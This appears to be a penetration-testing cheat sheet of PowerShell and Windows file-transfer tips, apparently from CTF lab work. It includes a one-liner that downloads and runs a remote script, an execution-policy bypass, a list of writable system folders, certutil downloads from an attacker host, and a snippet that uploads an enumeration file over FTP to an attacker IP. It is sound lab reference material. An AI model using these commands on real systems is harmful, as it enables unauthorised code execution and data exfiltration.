CLI Tips
Powershell
Load Powershell Module Over HTTP
Load Powershell Module Over HTTP:
IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1');'
Bypass Powershell Execution Policy
If you don't bypass the execution policy, you won't be able to run external powershell scripts. Run Powershell with Execution Policy Bypass:
powershell.exe -ExecutionPolicy Bypass
Switch to 64-bit Powershell from 32-bit
If you're on a 64-bit machine and running a 32-bit Powershell, then some things might not work, such as autologon discovery.
Check in powershell:
[environment]::Is64BitOperatingSystem
[environment]::Is64BitProcess
Access 64-bit Powershell at:
C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe
This path should exist for 32-bit applications even if you can't see it because it is virtual.
Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path.
View Hidden Files
Get-ChildItem -Force
Running Powershell commands from CMD
You can do it like this, but you need to press enter to get the output.
powershell -command "whoami"
Writable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
Transferring Files
HTTP Download
Start an HTTP server on your Linux machine:
python3 -m http.server
Download file over HTTP using curl (in case it's installed in Powershell):
curl http://IP:PORT/file.exe -O ./file.exe
Download file using certutil:
certutil.exe -f -urlcache http://IP:PORT/path/filename.exe filename.exe
FTP Upload
Start an FTP server on your linux machine:
pip3 install pyftpdlib
python3 -m pyftpdlib --username myuser --password mypass --write
If you don't specify username and password, then you can log in with user anonymous and no password.
$File = "C:\Users\svc-alfresco\Documents\winpeas.txt";
$ftp = "ftp://myuser:mypass@10.10.14.141:2121/winpeas.txt";
$webclient = New-Object -TypeName System.Net.WebClient;
$uri = New-Object -TypeName System.Uri -ArgumentList $ftp;
$webclient.UploadFile($uri, $File);
Last updated
Was this helpful?